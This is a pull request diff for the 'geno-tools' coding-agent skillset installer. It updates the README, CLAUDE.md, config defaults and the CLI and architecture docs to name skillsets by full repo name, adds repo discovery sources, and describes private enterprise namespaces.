### PR TITLE
Restructure README around skillset/subskillset nomenclature and enterprise use

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -48,9 +48,10 @@ See `config/defaults.yaml` for the full schema. The prefix is read at install ti
 
 `<name|url|path>` resolves in this order:
 
-1. **Registered short name** → git URL from `genotools/registry.py` (currently `agents`, `media`, `research`, `taxes`, `kaggle`, `dev`).
+1. **Registered repo name** → git URL from `genotools/registry.py` (currently `geno-agents`, `geno-media`, `geno-research`, `geno-kaggle`, `geno-dev`). Bare slugs like `media` are accepted as a backwards-compat fallback.
 2. **Existing local directory** → installed from disk.
 3. **Git URL** (`http(s)://`, `git@`, or `*.git`) → cloned.
+4. **Discovery sources** (`genotools/discovery.py`) → repos found in `~/.geno/config.yaml` `discovery.sources` (GitHub Enterprise, GitLab, etc.) that match the configured prefix and have a top-level `SKILL.md`.
 
 For URLs and paths the skillset name isn't known upfront. A shallow clone to `~/.geno-tools/.staging/` reads `pyproject.toml` for the project name, then the full install proceeds.
 

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -48,7 +48,7 @@ See `config/defaults.yaml` for the full schema. The prefix is read at install ti
 
 `<name|url|path>` resolves in this order:
 
-1. **Registered repo name** → git URL from `genotools/registry.py` (currently `geno-agents`, `geno-media`, `geno-research`, `geno-kaggle`, `geno-dev`). Bare slugs like `media` are accepted as a backwards-compat fallback.
+1. **Registered repo name** → git URL from `genotools/registry.py` (currently `geno-agents`, `geno-media`, `geno-research`, `geno-kaggle`, `geno-dev`). Bare slugs (the part after `geno-`) are also accepted as a backwards-compat fallback.
 2. **Existing local directory** → installed from disk.
 3. **Git URL** (`http(s)://`, `git@`, or `*.git`) → cloned.
 4. **Discovery sources** (`genotools/discovery.py`) → repos found in `~/.geno/config.yaml` `discovery.sources` (GitHub Enterprise, GitLab, etc.) that match the configured prefix and have a top-level `SKILL.md`.

--- a/README.md
+++ b/README.md
@@ -6,7 +6,7 @@ Meta-CLI for installing and managing coding agent skillsets in the `geno-*` ecos
 
 `geno-tools` installs/uninstalls/dev-links curated skillset repos (each a `geno-{name}` repo) into any supported coding agent. Inspired by [vercel-labs/skills](https://github.com/vercel-labs/skills) and [obra/superpowers](https://github.com/obra/superpowers), specialized for this ecosystem:
 
-- **Curated registry** — short names (`media`, `research`, `kaggle`, …) resolve to git URLs
+- **Curated registry** — full repo names (`geno-media`, `geno-research`, `geno-kaggle`, …) resolve to git URLs
 - **Multi-agent** — skills register with all agents via `npx skills add --agent '*'`
 - **Per-skillset venvs** — isolated at `~/.geno-tools/geno-{name}/venvs/`
 - **Dev-link** — point at a local checkout for meta-improvement
@@ -48,15 +48,17 @@ Add to `opencode.json`:
 
 ## Usage
 
+Skillsets are referenced by their full repo name (e.g. `geno-media`) so the same form works whether the entry comes from the public registry, a private mirror, or a direct git URL.
+
 ```bash
-geno-tools ls --available                  # registry
-geno-tools install <slug>                  # install by short slug from the registry
-geno-tools install <git-url>               # install any compliant repo by URL
-geno-tools dev <slug> ~/src/<repo>         # link a local dev checkout
-geno-tools ls                              # installed
-geno-tools doctor                          # verify links, venvs, targets
-geno-tools update [<slug>]                 # update one or all
-geno-tools remove <slug> [--keep-data]
+geno-tools ls --available                       # registry
+geno-tools install geno-<name>                  # install by full repo name from the registry
+geno-tools install <git-url>                    # install any compliant repo by URL
+geno-tools dev geno-<name> ~/src/geno-<name>    # link a local dev checkout
+geno-tools ls                                   # installed
+geno-tools doctor                               # verify links, venvs, targets
+geno-tools update [geno-<name>]                 # update one or all
+geno-tools remove geno-<name> [--keep-data]
 ```
 
 ## Layout
@@ -91,9 +93,9 @@ Subskillsets keep individual SKILL.md files small and tightly scoped, while the 
 
 There are three ways to make a skillset installable through `geno-tools install`:
 
-1. **Curated registry** — submit a PR adding `{slug}: <git-url>` to `genotools/registry.py`. After that, `geno-tools install <slug>` works for everyone by short name.
+1. **Curated registry** — submit a PR adding `"<repo-name>": "<git-url>"` to `genotools/registry.py`. After that, `geno-tools install <repo-name>` works for everyone (e.g. `geno-tools install geno-media`).
 2. **Direct git URL** — anyone can install any compliant repo without a registry entry: `geno-tools install https://github.com/you/your-skillset.git`. This is the recommended path for private, internal, or experimental skillsets.
-3. **Local dev link** — `geno-tools dev <slug> ~/src/<repo>` to iterate on a checkout without committing.
+3. **Local dev link** — `geno-tools dev <repo-name> ~/src/<repo-name>` to iterate on a checkout without committing.
 
 A minimum viable skillset only needs a root `SKILL.md` and a `commands/` directory; everything else (venv, runtime symlinks, configs, subskillsets) is opt-in.
 
@@ -103,15 +105,15 @@ All public repos in the `geno-*` namespace, grouped by role.
 
 ### Skillsets
 
-Installable by short slug via `geno-tools install <slug>`:
+Installable by full repo name via `geno-tools install <repo>`:
 
-| Slug | Repo | Description |
-|------|------|-------------|
-| `agents` | [42euge/geno-agents](https://github.com/42euge/geno-agents) | Multi-agent coordination, registration, autonomous loops |
-| `media` | [42euge/geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
-| `research` | [42euge/geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
-| `kaggle` | [42euge/geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, discussion scraping |
-| `dev` | [42euge/geno-dev](https://github.com/42euge/geno-dev) | Developer/infrastructure skills — task execution, commit rewriting, Colab upload plumbing |
+| Repo | Description |
+|------|-------------|
+| [42euge/geno-agents](https://github.com/42euge/geno-agents) | Multi-agent coordination, registration, autonomous loops |
+| [42euge/geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
+| [42euge/geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
+| [42euge/geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, discussion scraping |
+| [42euge/geno-dev](https://github.com/42euge/geno-dev) | Developer/infrastructure skills — task execution, commit rewriting, Colab upload plumbing |
 
 ### Coordination and state
 
@@ -152,7 +154,7 @@ How it works in practice:
 1. **Pick your namespace**. Use your company slug as the prefix (`acme-`, `globex-`, etc.). All internal skillsets share that prefix the way public ones share `geno-`.
 2. **Host privately**. Put the repos in your own GitHub Enterprise / GitLab / Bitbucket / private mirror. geno-tools resolves any git URL — there is no central registry it has to call out to.
 3. **Run geno-tools internally**. Pin the upstream OSS release, fork it, or vendor it. The CLI is plain Python, has no telemetry, and the install flow only talks to the git remote you point it at.
-4. **Mix public and private freely**. A developer can run `geno-tools install media` (public) alongside `geno-tools install git@github.acme.com:platform/acme-finance.git` (private) on the same machine. They share `~/.geno-tools/`, the same venv strategy, and the same slash-command surface in Claude Code / Codex / Cursor / Gemini CLI / OpenCode.
+4. **Mix public and private freely**. A developer can run `geno-tools install geno-media` (public) alongside `geno-tools install git@github.acme.com:platform/acme-finance.git` (private) on the same machine. They share `~/.geno-tools/`, the same venv strategy, and the same slash-command surface in Claude Code / Codex / Cursor / Gemini CLI / OpenCode.
 
 The result: sensitive prompts, datasets, and domain knowledge stay inside the company boundary, while the runtime, the file format, and the multi-agent integrations are the same fast-moving open-source code everyone else uses. You inherit upstream improvements without giving up control of your skill content.
 

--- a/README.md
+++ b/README.md
@@ -6,7 +6,7 @@ Meta-CLI for installing and managing coding agent skillsets in the `geno-*` ecos
 
 `geno-tools` installs/uninstalls/dev-links curated skillset repos (each a `geno-{name}` repo) into any supported coding agent. Inspired by [vercel-labs/skills](https://github.com/vercel-labs/skills) and [obra/superpowers](https://github.com/obra/superpowers), specialized for this ecosystem:
 
-- **Curated registry** — full repo names (`geno-media`, `geno-research`, `geno-kaggle`, …) resolve to git URLs
+- **Curated registry** — full repo names (`geno-<name>`, e.g. those listed below) resolve to git URLs
 - **Multi-agent** — skills register with all agents via `npx skills add --agent '*'`
 - **Per-skillset venvs** — isolated at `~/.geno-tools/geno-{name}/venvs/`
 - **Dev-link** — point at a local checkout for meta-improvement
@@ -48,7 +48,7 @@ Add to `opencode.json`:
 
 ## Usage
 
-Skillsets are referenced by their full repo name (e.g. `geno-media`) so the same form works whether the entry comes from the public registry, a private mirror, or a direct git URL.
+Skillsets are referenced by their full repo name (e.g. `geno-<name>` in the public namespace, or `acme-<name>` for a private one) so the same form works whether the entry comes from the public registry, a private mirror, or a direct git URL.
 
 ```bash
 geno-tools ls --available                       # registry
@@ -76,14 +76,13 @@ geno-tools remove geno-<name> [--keep-data]
 
 A **skillset** is a self-contained git repo named `{prefix}-{slug}` that geno-tools knows how to clone, sandbox, link, and register with any supported coding agent. The prefix is the org/brand namespace; the slug names the domain.
 
-- `geno-media` — public skillset under the `geno` namespace covering media (TTS, video, podcasts)
-- `geno-research` — public skillset for wiki-style research notes and paper generation
-- `acme-finance` — hypothetical private skillset under an `acme` namespace
+- `geno-<name>` — public skillset under the `geno` namespace (see [the registry](#existing-geno--repos) for current ones)
+- `acme-<name>` — hypothetical private skillset under an `acme` namespace
 
 Inside each skillset:
 
 - `SKILL.md` at the root — the umbrella manifest the agent loads first
-- `skills/<subskill>/SKILL.md` — **subskillsets**, each scoped to one focused capability (e.g. `geno-media` ships subskillsets for `audiobook-create`, `video-manim`, `podcast-cohost`). geno-tools registers all of them in one shot via `npx skills add --skill '*'`.
+- `skills/<subskill>/SKILL.md` — **subskillsets**, each scoped to one focused capability (a single skillset typically ships several). geno-tools registers all of them in one shot via `npx skills add --skill '*'`.
 - `commands/*.md` — slash commands surfaced as `/{configured-prefix}-*` in the agent
 - Optional `pyproject.toml`, runtime scripts, and copy-once configs
 
@@ -93,7 +92,7 @@ Subskillsets keep individual SKILL.md files small and tightly scoped, while the 
 
 There are three ways to make a skillset installable through `geno-tools install`:
 
-1. **Curated registry** — submit a PR adding `"<repo-name>": "<git-url>"` to `genotools/registry.py`. After that, `geno-tools install <repo-name>` works for everyone (e.g. `geno-tools install geno-media`).
+1. **Curated registry** — submit a PR adding `"<repo-name>": "<git-url>"` to `genotools/registry.py`. After that, `geno-tools install <repo-name>` works for everyone.
 2. **Direct git URL** — anyone can install any compliant repo without a registry entry: `geno-tools install https://github.com/you/your-skillset.git`. This is the recommended path for private, internal, or experimental skillsets.
 3. **Local dev link** — `geno-tools dev <repo-name> ~/src/<repo-name>` to iterate on a checkout without committing.
 
@@ -154,7 +153,7 @@ How it works in practice:
 1. **Pick your namespace**. Use your company slug as the prefix (`acme-`, `globex-`, etc.). All internal skillsets share that prefix the way public ones share `geno-`.
 2. **Host privately**. Put the repos in your own GitHub Enterprise / GitLab / Bitbucket / private mirror. geno-tools resolves any git URL — there is no central registry it has to call out to.
 3. **Run geno-tools internally**. Pin the upstream OSS release, fork it, or vendor it. The CLI is plain Python, has no telemetry, and the install flow only talks to the git remote you point it at.
-4. **Mix public and private freely**. A developer can run `geno-tools install geno-media` (public) alongside `geno-tools install git@github.acme.com:platform/acme-finance.git` (private) on the same machine. They share `~/.geno-tools/`, the same venv strategy, and the same slash-command surface in Claude Code / Codex / Cursor / Gemini CLI / OpenCode.
+4. **Mix public and private freely**. A developer can run `geno-tools install geno-<name>` (public) alongside `geno-tools install git@github.acme.com:platform/acme-<name>.git` (private) on the same machine. They share `~/.geno-tools/`, the same venv strategy, and the same slash-command surface in Claude Code / Codex / Cursor / Gemini CLI / OpenCode.
 
 The result: sensitive prompts, datasets, and domain knowledge stay inside the company boundary, while the runtime, the file format, and the multi-agent integrations are the same fast-moving open-source code everyone else uses. You inherit upstream improvements without giving up control of your skill content.
 

--- a/README.md
+++ b/README.md
@@ -49,13 +49,14 @@ Add to `opencode.json`:
 ## Usage
 
 ```bash
-geno-tools ls --available                # registry
-geno-tools install media                 # install geno-media
-geno-tools dev media ~/src/geno-media    # link a local dev checkout
-geno-tools ls                            # installed
-geno-tools doctor                        # verify links, venvs, targets
-geno-tools update media
-geno-tools remove media [--keep-data]
+geno-tools ls --available                  # registry
+geno-tools install <slug>                  # install by short slug from the registry
+geno-tools install <git-url>               # install any compliant repo by URL
+geno-tools dev <slug> ~/src/<repo>         # link a local dev checkout
+geno-tools ls                              # installed
+geno-tools doctor                          # verify links, venvs, targets
+geno-tools update [<slug>]                 # update one or all
+geno-tools remove <slug> [--keep-data]
 ```
 
 ## Layout
@@ -98,7 +99,11 @@ A minimum viable skillset only needs a root `SKILL.md` and a `commands/` directo
 
 ## Existing geno-* repos
 
-Skillsets currently published under the public `geno-*` namespace:
+All public repos in the `geno-*` namespace, grouped by role.
+
+### Skillsets
+
+Installable by short slug via `geno-tools install <slug>`:
 
 | Slug | Repo | Description |
 |------|------|-------------|
@@ -106,20 +111,35 @@ Skillsets currently published under the public `geno-*` namespace:
 | `media` | [42euge/geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
 | `research` | [42euge/geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
 | `kaggle` | [42euge/geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, discussion scraping |
-| `dev` | [42euge/geno-dev](https://github.com/42euge/geno-dev) | Developer utilities (planned) |
+| `dev` | [42euge/geno-dev](https://github.com/42euge/geno-dev) | Developer/infrastructure skills — task execution, commit rewriting, Colab upload plumbing |
 
-Supporting repos in the same ecosystem (not skillsets — they're services, agents, or integrations consumed by skillsets):
+### Coordination and state
+
+Services consumed by skillsets to coordinate sessions and persist state:
 
 | Repo | Description |
 |------|-------------|
-| [geno-msg](https://github.com/42euge/geno-msg) | Inter-agent messaging |
-| [geno-notes](https://github.com/42euge/geno-notes) | Project journal, task management, timestamped notes |
-| [geno-mon](https://github.com/42euge/geno-mon) | Agent monitoring |
-| [geno-bot](https://github.com/42euge/geno-bot) | Bluesky companion bot |
-| [geno-colab](https://github.com/42euge/geno-colab) | Google Colab integration |
-| [geno-bench](https://github.com/42euge/geno-bench) | Benchmarking infrastructure |
-| [geno-term](https://github.com/42euge/geno-term) | Terminal utilities |
-| [geno-vla](https://github.com/42euge/geno-vla) | Vision-language-action experiments |
+| [42euge/geno-msg](https://github.com/42euge/geno-msg) | Inter-agent messaging — file-based storage, CLI, MCP server, and hooks for cross-session communication |
+| [42euge/geno-notes](https://github.com/42euge/geno-notes) | Project journal with two-scope storage for tasks, journal, plans, and audit log |
+| [42euge/geno-mon](https://github.com/42euge/geno-mon) | Agent observability for insight into agentic harnesses |
+
+### Runtime and tooling
+
+Lower-level building blocks that power skillsets and the agent itself:
+
+| Repo | Description |
+|------|-------------|
+| [42euge/geno-cli](https://github.com/42euge/geno-cli) | Agentic coding assistant TUI powered by Gemma 4 via Ollama |
+| [42euge/geno-iso](https://github.com/42euge/geno-iso) | Isolated Docker containers for running Claude Code |
+| [42euge/geno-term](https://github.com/42euge/geno-term) | Terminal automation for Claude Code session recovery with iTerm2 tabs and panes |
+| [42euge/geno-vla](https://github.com/42euge/geno-vla) | Vision-Language-Action MCP server for Claude Code with smart browser automation |
+| [42euge/geno-bench](https://github.com/42euge/geno-bench) | Mine Claude Code session logs for failure patterns and turn observed failures into benchmark tasks |
+
+### Meta
+
+| Repo | Description |
+|------|-------------|
+| [42euge/geno-tools](https://github.com/42euge/geno-tools) | This repo — installer/manager for everything above. Also ships the bundled `geno-icons` skill for pixel-art project icons. |
 
 ## Enterprise: private skillsets, public tooling
 

--- a/README.md
+++ b/README.md
@@ -6,7 +6,7 @@ Meta-CLI for installing and managing coding agent skillsets in the `geno-*` ecos
 
 `geno-tools` installs/uninstalls/dev-links curated skillset repos (each a `geno-{name}` repo) into any supported coding agent. Inspired by [vercel-labs/skills](https://github.com/vercel-labs/skills) and [obra/superpowers](https://github.com/obra/superpowers), specialized for this ecosystem:
 
-- **Curated registry** — short names (`media`, `research`, `taxes`, …) resolve to git URLs
+- **Curated registry** — short names (`media`, `research`, `kaggle`, …) resolve to git URLs
 - **Multi-agent** — skills register with all agents via `npx skills add --agent '*'`
 - **Per-skillset venvs** — isolated at `~/.geno-tools/geno-{name}/venvs/`
 - **Dev-link** — point at a local checkout for meta-improvement
@@ -69,15 +69,72 @@ geno-tools remove media [--keep-data]
     └── configs/    # copy-once user-editable configs
 ```
 
-## Skillsets
+## Skillsets and subskillsets
 
-| Name | Repo | Status |
-|---|---|---|
-| `media` | [42euge/geno-media](https://github.com/42euge/geno-media) | ✅ extracted |
-| `research` | [42euge/geno-research](https://github.com/42euge/geno-research) | ✅ extracted |
-| `taxes` | `42euge/geno-taxes` | 🚧 pending |
-| `kaggle` | `42euge/geno-kaggle` | 🚧 pending |
-| `dev` | `42euge/geno-dev` | 🚧 pending |
+A **skillset** is a self-contained git repo named `{prefix}-{slug}` that geno-tools knows how to clone, sandbox, link, and register with any supported coding agent. The prefix is the org/brand namespace; the slug names the domain.
+
+- `geno-media` — public skillset under the `geno` namespace covering media (TTS, video, podcasts)
+- `geno-research` — public skillset for wiki-style research notes and paper generation
+- `acme-finance` — hypothetical private skillset under an `acme` namespace
+
+Inside each skillset:
+
+- `SKILL.md` at the root — the umbrella manifest the agent loads first
+- `skills/<subskill>/SKILL.md` — **subskillsets**, each scoped to one focused capability (e.g. `geno-media` ships subskillsets for `audiobook-create`, `video-manim`, `podcast-cohost`). geno-tools registers all of them in one shot via `npx skills add --skill '*'`.
+- `commands/*.md` — slash commands surfaced as `/{configured-prefix}-*` in the agent
+- Optional `pyproject.toml`, runtime scripts, and copy-once configs
+
+Subskillsets keep individual SKILL.md files small and tightly scoped, while the umbrella SKILL.md gives the agent enough context to discover them.
+
+## Onboarding a skillset
+
+There are three ways to make a skillset installable through `geno-tools install`:
+
+1. **Curated registry** — submit a PR adding `{slug}: <git-url>` to `genotools/registry.py`. After that, `geno-tools install <slug>` works for everyone by short name.
+2. **Direct git URL** — anyone can install any compliant repo without a registry entry: `geno-tools install https://github.com/you/your-skillset.git`. This is the recommended path for private, internal, or experimental skillsets.
+3. **Local dev link** — `geno-tools dev <slug> ~/src/<repo>` to iterate on a checkout without committing.
+
+A minimum viable skillset only needs a root `SKILL.md` and a `commands/` directory; everything else (venv, runtime symlinks, configs, subskillsets) is opt-in.
+
+## Existing geno-* repos
+
+Skillsets currently published under the public `geno-*` namespace:
+
+| Slug | Repo | Description |
+|------|------|-------------|
+| `agents` | [42euge/geno-agents](https://github.com/42euge/geno-agents) | Multi-agent coordination, registration, autonomous loops |
+| `media` | [42euge/geno-media](https://github.com/42euge/geno-media) | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
+| `research` | [42euge/geno-research](https://github.com/42euge/geno-research) | Wiki-based research, paper generation, repo documentation |
+| `kaggle` | [42euge/geno-kaggle](https://github.com/42euge/geno-kaggle) | Kaggle benchmarking, notebook upload, discussion scraping |
+| `dev` | [42euge/geno-dev](https://github.com/42euge/geno-dev) | Developer utilities (planned) |
+
+Supporting repos in the same ecosystem (not skillsets — they're services, agents, or integrations consumed by skillsets):
+
+| Repo | Description |
+|------|-------------|
+| [geno-msg](https://github.com/42euge/geno-msg) | Inter-agent messaging |
+| [geno-notes](https://github.com/42euge/geno-notes) | Project journal, task management, timestamped notes |
+| [geno-mon](https://github.com/42euge/geno-mon) | Agent monitoring |
+| [geno-bot](https://github.com/42euge/geno-bot) | Bluesky companion bot |
+| [geno-colab](https://github.com/42euge/geno-colab) | Google Colab integration |
+| [geno-bench](https://github.com/42euge/geno-bench) | Benchmarking infrastructure |
+| [geno-term](https://github.com/42euge/geno-term) | Terminal utilities |
+| [geno-vla](https://github.com/42euge/geno-vla) | Vision-language-action experiments |
+
+## Enterprise: private skillsets, public tooling
+
+geno-tools is built so an organization can run the same agentic stack as the open-source community without leaking proprietary prompts, code, or data.
+
+The pattern is to mirror the `geno-*` convention under your own namespace: `{company-slug}-{skillset-slug}`. For example, an internal skillset for incident response at Acme would live in a repo named `acme-incident-response`, and a finance skillset would be `acme-finance`. Same layout, same `SKILL.md` + `commands/` + optional venv shape — just hosted privately.
+
+How it works in practice:
+
+1. **Pick your namespace**. Use your company slug as the prefix (`acme-`, `globex-`, etc.). All internal skillsets share that prefix the way public ones share `geno-`.
+2. **Host privately**. Put the repos in your own GitHub Enterprise / GitLab / Bitbucket / private mirror. geno-tools resolves any git URL — there is no central registry it has to call out to.
+3. **Run geno-tools internally**. Pin the upstream OSS release, fork it, or vendor it. The CLI is plain Python, has no telemetry, and the install flow only talks to the git remote you point it at.
+4. **Mix public and private freely**. A developer can run `geno-tools install media` (public) alongside `geno-tools install git@github.acme.com:platform/acme-finance.git` (private) on the same machine. They share `~/.geno-tools/`, the same venv strategy, and the same slash-command surface in Claude Code / Codex / Cursor / Gemini CLI / OpenCode.
+
+The result: sensitive prompts, datasets, and domain knowledge stay inside the company boundary, while the runtime, the file format, and the multi-agent integrations are the same fast-moving open-source code everyone else uses. You inherit upstream improvements without giving up control of your skill content.
 
 ## Legacy (transitional)
 

--- a/config/defaults.yaml
+++ b/config/defaults.yaml
@@ -12,6 +12,28 @@
 aliases:
   command_prefix: "gt"
 
+# Discovery: where to look for candidate skillset repos.
+# Each source is a provider that can list repos in some org/group/project.
+# A repo is considered installable when (a) its name matches `prefix*`
+# and (b) it has a SKILL.md at root.
+#
+# `auth_env` names an environment variable holding the token — never paste
+# tokens into this file directly.
+discovery:
+  sources:
+    - kind: github
+      org: 42euge          # discovers public geno-* repos
+    # - kind: github
+    #   org: acme-corp
+    #   base_url: https://github.acme.com/api/v3
+    #   prefix: acme-
+    #   auth_env: ACME_GITHUB_TOKEN
+    # - kind: gitlab
+    #   group: platform/skillsets
+    #   base_url: https://gitlab.acme.com
+    #   prefix: acme-
+    #   auth_env: ACME_GITLAB_TOKEN
+
 # Workspace layout (used by geno-dev-workspaces-init)
 workspaces:
   mode: color

--- a/config/defaults.yaml
+++ b/config/defaults.yaml
@@ -6,9 +6,9 @@
 # into Claude Code (or other agents) during `geno-tools install`.
 #
 # command_prefix: the short prefix for slash commands.
-#   "gt" (default) → /gt-install, /gt-media-audiobook-create
-#   "geno" → /geno-install, /geno-media-audiobook-create
-#   "" (empty) → /install, /media-audiobook-create
+#   "gt" (default) → /gt-install, /gt-<skillset>-<command>
+#   "geno" → /geno-install, /geno-<skillset>-<command>
+#   "" (empty) → /install, /<skillset>-<command>
 aliases:
   command_prefix: "gt"
 

--- a/docs/architecture/index.md
+++ b/docs/architecture/index.md
@@ -19,19 +19,20 @@ All plugin paths wrap the Python CLI, so they require the Python package install
 
 When you run `geno-tools install <name|url|path>`, the source is resolved in order:
 
-1. **Registered short name** — looked up in `genotools/registry.py`
+1. **Registered repo name** — looked up in `genotools/registry.py`
 2. **Local directory** — installed from disk
 3. **Git URL** — cloned
+4. **Discovery sources** — repos found in configured GitHub / GitLab / etc. groups (see `genotools/discovery.py`)
 
 For URLs and local paths, the skillset name isn't known upfront. geno-tools does a shallow clone to a staging directory, reads `pyproject.toml` for the project name, then proceeds with the full install.
 
 ## Install flow
 
 ```
-geno-tools install media
+geno-tools install geno-<name>
         │
         ├── resolve source (registry → git URL)
-        ├── bare clone into ~/.geno-tools/geno-media/.git/
+        ├── bare clone into ~/.geno-tools/geno-<name>/.git/
         ├── create main worktree
         ├── create venv + editable install (if pyproject.toml exists)
         ├── symlink [project.scripts] binaries into ~/.local/bin/
@@ -39,7 +40,7 @@ geno-tools install media
         └── npx skills add --agent '*' (register skills with all agents)
 ```
 
-On failure at any step, the partially created `~/.geno-tools/geno-{name}/` directory is cleaned up automatically.
+On failure at any step, the partially created `~/.geno-tools/geno-<name>/` directory is cleaned up automatically.
 
 ## Uninstall
 
@@ -47,7 +48,7 @@ Removal reverses the install:
 
 1. `npx skills remove` — unregister skills from all agents
 2. Remove `~/.local/bin/` symlinks that point into this skillset's venv
-3. Delete `~/.geno-tools/geno-{name}/` (or preserve venvs/worktrees with `--keep-data`)
+3. Delete `~/.geno-tools/geno-<name>/` (or preserve venvs/worktrees with `--keep-data`)
 
 ## Plugin structure
 

--- a/docs/architecture/variants.md
+++ b/docs/architecture/variants.md
@@ -11,25 +11,25 @@ fork → use → (iterate) → promote or remove
 ### 1. Fork a variant
 
 ```bash
-geno-tools fork media exp-1
+geno-tools fork geno-<name> exp-1
 ```
 
 This creates:
 
 - A new git branch `exp-1` off `main`
-- A worktree at `~/.geno-tools/geno-media/.worktrees/exp-1/`
+- A worktree at `~/.geno-tools/geno-<name>/.worktrees/exp-1/`
 - Shares the existing venv by default
 
 Add `--isolated-venv` if the variant needs different Python dependencies:
 
 ```bash
-geno-tools fork media exp-1 --isolated-venv
+geno-tools fork geno-<name> exp-1 --isolated-venv
 ```
 
 ### 2. Activate the variant
 
 ```bash
-geno-tools use media@exp-1
+geno-tools use geno-<name>@exp-1
 ```
 
 This repoints the `active` symlink from `main/` to `.worktrees/exp-1/`. The target adapter picks up the change immediately — slash commands and SKILL.md now come from the variant.
@@ -37,7 +37,7 @@ This repoints the `active` symlink from `main/` to `.worktrees/exp-1/`. The targ
 #### Cwd-scoped overrides
 
 ```bash
-geno-tools use media@exp-1 --here
+geno-tools use geno-<name>@exp-1 --here
 ```
 
 With `--here`, the override only applies in the current working directory. Other projects keep using whatever variant was globally active. Useful for testing a variant in one project without disrupting others.
@@ -51,7 +51,7 @@ Edit files in the worktree directly. If you used `dev` mode, edits to your local
 When the variant is ready:
 
 ```bash
-geno-tools promote media exp-1
+geno-tools promote geno-<name> exp-1
 ```
 
 This merges the `exp-1` branch into `main` locally (no upstream push). The variant worktree stays around until you explicitly remove it.
@@ -59,7 +59,7 @@ This merges the `exp-1` branch into `main` locally (no upstream push). The varia
 To discard:
 
 ```bash
-geno-tools remove media    # removes everything
+geno-tools remove geno-<name>    # removes everything
 ```
 
 ## Multiple variants
@@ -67,8 +67,8 @@ geno-tools remove media    # removes everything
 You can have multiple variants forked at once. Only one is `active` at a time (globally, or per-cwd with `--here`).
 
 ```bash
-geno-tools fork media exp-1
-geno-tools fork media exp-2
-geno-tools use media@exp-2    # switch to exp-2
-geno-tools use media@main     # switch back to main
+geno-tools fork geno-<name> exp-1
+geno-tools fork geno-<name> exp-2
+geno-tools use geno-<name>@exp-2    # switch to exp-2
+geno-tools use geno-<name>@main     # switch back to main
 ```

--- a/docs/cli-reference.md
+++ b/docs/cli-reference.md
@@ -26,14 +26,14 @@ geno-tools ls --available    # curated registry
 Install a skillset from the registry, a git URL, or a local path. Slash command: `/gt-install`.
 
 ```bash
-geno-tools install media
+geno-tools install geno-media
 geno-tools install https://github.com/someone/geno-custom.git
 geno-tools install ./local-skillset
 ```
 
 **Source resolution order:**
 
-1. Registered short name (e.g. `media` -> git URL from registry)
+1. Registered repo name (e.g. `geno-media` -> git URL from registry; legacy bare slugs like `media` still resolve)
 2. Local directory path
 3. Git URL (`https://`, `git@`, or `*.git`)
 
@@ -50,7 +50,7 @@ geno-tools install ./local-skillset
 Symlink a local checkout as the main worktree. For active development on a skillset.
 
 ```bash
-geno-tools dev media ~/src/geno-media
+geno-tools dev geno-media ~/src/geno-media
 ```
 
 If the skillset is already installed, it's removed first (configs preserved). The local path becomes a symlink target — edits take effect immediately.
@@ -59,7 +59,7 @@ If the skillset is already installed, it's removed first (configs preserved). Th
 
 | Arg | Description |
 |-----|-------------|
-| `name` | Skillset name |
+| `name` | Full repo name (e.g. `geno-media`) |
 | `path` | Path to local checkout |
 
 ---
@@ -69,15 +69,15 @@ If the skillset is already installed, it's removed first (configs preserved). Th
 Create a variant worktree branched off main. Use this to experiment without touching the primary install.
 
 ```bash
-geno-tools fork media exp-1
-geno-tools fork media exp-1 --isolated-venv
+geno-tools fork geno-media exp-1
+geno-tools fork geno-media exp-1 --isolated-venv
 ```
 
 **Arguments:**
 
 | Arg | Description |
 |-----|-------------|
-| `name` | Skillset name |
+| `name` | Full repo name |
 | `variant` | Variant ID (becomes the git branch and worktree directory name) |
 
 **Options:**
@@ -93,15 +93,15 @@ geno-tools fork media exp-1 --isolated-venv
 Switch the active variant for a skillset.
 
 ```bash
-geno-tools use media@exp-1          # global: repoint active symlink
-geno-tools use media@exp-1 --here   # cwd-only override
+geno-tools use geno-media@exp-1          # global: repoint active symlink
+geno-tools use geno-media@exp-1 --here   # cwd-only override
 ```
 
 **Arguments:**
 
 | Arg | Description |
 |-----|-------------|
-| `spec` | `<name>@<variant>` format (e.g. `taxes@exp-1`) |
+| `spec` | `<name>@<variant>` format (e.g. `geno-media@exp-1`) |
 
 **Options:**
 
@@ -116,7 +116,7 @@ geno-tools use media@exp-1 --here   # cwd-only override
 Merge a variant back into main. Does not push upstream.
 
 ```bash
-geno-tools promote media exp-1
+geno-tools promote geno-media exp-1
 ```
 
 **Arguments:**
@@ -133,8 +133,8 @@ geno-tools promote media exp-1
 Pull latest changes on the main worktree. Slash command: `/gt-update`.
 
 ```bash
-geno-tools update media    # update one
-geno-tools update          # update all
+geno-tools update geno-media    # update one
+geno-tools update               # update all
 ```
 
 Skips skillsets in `dev` mode (the source is already live).
@@ -152,8 +152,8 @@ Skips skillsets in `dev` mode (the source is already live).
 Uninstall a skillset. Replays the install in reverse — deterministic, no orphaned files. Slash command: `/gt-remove`.
 
 ```bash
-geno-tools remove media
-geno-tools remove media --keep-data
+geno-tools remove geno-media
+geno-tools remove geno-media --keep-data
 ```
 
 **Arguments:**

--- a/docs/cli-reference.md
+++ b/docs/cli-reference.md
@@ -26,14 +26,14 @@ geno-tools ls --available    # curated registry
 Install a skillset from the registry, a git URL, or a local path. Slash command: `/gt-install`.
 
 ```bash
-geno-tools install geno-media
+geno-tools install geno-<name>
 geno-tools install https://github.com/someone/geno-custom.git
 geno-tools install ./local-skillset
 ```
 
 **Source resolution order:**
 
-1. Registered repo name (e.g. `geno-media` -> git URL from registry; legacy bare slugs like `media` still resolve)
